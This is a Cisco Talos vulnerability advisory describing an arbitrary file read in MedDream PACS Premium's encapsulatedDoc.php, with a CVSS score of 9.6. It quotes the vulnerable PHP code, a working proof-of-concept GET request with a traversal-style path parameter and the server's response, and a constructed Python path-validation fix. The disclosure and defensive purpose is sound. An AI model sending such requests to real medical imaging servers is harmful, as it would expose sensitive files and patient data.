Talos Vulnerability Report

TALOS-2025-2273

MedDream PACS Premium encapsulatedDoc arbitrary file read vulnerability

January 20, 2026
CVE Number

CVE-2025-53912

SUMMARY

An arbitrary file read vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A specially crafted HTTP request can lead to an arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

MedDream PACS Premium 7.3.6.870

PRODUCT URLS

MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/

CVSSv3 SCORE

9.6 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CWE

CWE-73 - External Control of File Name or Path

DETAILS

MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.

A post-authentication arbitrary file read vulnerability exists in the Pacs/encapsulatedDoc.php script. The vulnerable code is shown below:

/// line 13
$path = urldecode($_GET['path']);  /// [1]
$mimetype = urldecode($_GET['mimetype']);
global $ENCAPSULATED_DOC_ICON_TBL;
if (!isset($ENCAPSULATED_DOC_ICON_TBL[ strtoupper($mimetype) ])) {
    print "<h2><font color=red>";
    printf(pacsone_gettext("Unknown MIMETYPE: %s"), $mimetype);
    print "</font></h2>";
    exit();
}
$type = "Content-type: $mimetype";
header($type);
$fp = fopen($path, "rb");  /// [2]
fpassthru($fp);
fclose($fp);

?>

As we can see at line [1], the attacker fully controls the $path variable, which is neither sanitized nor restricted to any specific directory. Later in the code, at [2], that value is passed straight to fopen(), which leads to an arbitrary file read. An attacker exploiting this vulnerability can read sensitive files located on the server, which could ultimately lead to arbitrary code execution. An example request triggering this vulnerability is presented below:

GET /Pacs/encapsulatedDoc.php?path=c:\test\secret.txt&&mimetype=application/pdf HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%D0%009T-GQb%04wM%D1D%22%17Z%D2%09b~%3D%EB%C1%11_%3D%FC%2C%B59%82%20; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i


RESP

HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 16:43:42 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/pdf

 omg!!!
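
The check that is missing between [1] and [2], as an added example that is not MedDream's code: a path is accepted only when it is relative and resolves inside a fixed document store, and the MIME type must be in an allow-list (the store layout, the ALLOWED_MIMETYPES table standing in for ENCAPSULATED_DOC_ICON_TBL, and all file names are constructed assumptions).

```python
import contextlib
import os
import re
import tempfile
# Stand-in for the ENCAPSULATED_DOC_ICON_TBL lookup in encapsulatedDoc.php (constructed).
ALLOWED_MIMETYPES = {"APPLICATION/PDF", "TEXT/PLAIN"}

class EncapsulatedDocError(ValueError):
    """Raised for any request that must not reach fopen()."""

def resolve_document(root: str, requested: str, mimetype: str) -> str:
    """Return the absolute file to serve, or raise EncapsulatedDocError."""
    if mimetype.upper() not in ALLOWED_MIMETYPES:
        raise EncapsulatedDocError(f"Unknown MIMETYPE: {mimetype}")
    rel = requested.replace("\\", "/")  # Windows hosts accept both separators
    # A document reference must be relative to the store: refuse "/etc/..." and "c:/...".
    if rel.startswith("/") or re.match(r"^[A-Za-z]:/", rel):
        raise EncapsulatedDocError("absolute path rejected")
    real_root = os.path.realpath(root)
    # realpath() collapses ".." and follows symlinks, so a planted link is caught below too.
    candidate = os.path.realpath(os.path.join(real_root, rel))
    try:  # commonpath, not startswith(): "/data/docs2/x" is not inside "/data/docs"
        inside = os.path.commonpath([real_root, candidate]) == real_root
    except ValueError:  # different drives on Windows
        inside = False
    if not inside:
        raise EncapsulatedDocError("path escapes document store")
    if not os.path.isfile(candidate):
        raise EncapsulatedDocError("not a regular file")
    return candidate

def outcome(root: str, requested: str, mimetype: str = "application/pdf") -> str:
    try:  # 'served' or 'rejected: <reason>' for one request
        resolve_document(root, requested, mimetype)
        return "served"
    except EncapsulatedDocError as exc:
        return f"rejected: {exc}"

def make_demo_store() -> str:
    """Constructed layout: <tmp>/store/report.pdf, <tmp>/secret.txt, store/link.txt -> secret.txt."""
    base = tempfile.mkdtemp()
    store = os.path.join(base, "store")
    os.mkdir(store)
    with open(os.path.join(store, "report.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed sample\n")
    with open(os.path.join(base, "secret.txt"), "w") as fh:
        fh.write("omg!!!")
    with contextlib.suppress(OSError, NotImplementedError):  # no symlinks: link.txt absent
        os.symlink(os.path.join(base, "secret.txt"), os.path.join(store, "link.txt"))
    return store
```

Calling outcome(make_demo_store(), "../secret.txt") or with "c:\\test\\secret.txt" returns a rejection, while "report.pdf" is served.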

TIMELINE

2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.